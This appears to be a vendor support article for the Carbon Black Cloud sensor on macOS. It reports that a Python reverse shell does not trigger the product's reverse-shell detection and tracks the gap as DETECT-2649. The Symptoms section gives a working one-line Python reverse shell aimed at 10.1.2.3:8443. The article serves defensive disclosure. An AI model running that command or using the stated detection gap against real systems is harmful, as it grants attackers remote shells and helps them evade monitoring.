Environment
- CBC sensor: All versions
- CBC Console: All versions
- Apple MacOS: All versions
Symptoms
Run this command generated by Google's reverse shell generator at :
https://revshells.com/
python -c 'import sys, socket,os,pty;s=socket.socket();s.connect(("10.1.2.3",8443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("sh")'
- find the netconn on the investigate page with the search: netconn_ipv4:10.1.2.3
- Note that there is no TTP "reverse_shell" or alert fired (Filter on TTP "reverse_shell")
Cause
This is limitation DETECT-2649.
Resolution
DETECT-2649, which concerns the particular class of Reverse Shell code wrapped in python interpreter, will be addressed in future rules iterations.
Related Content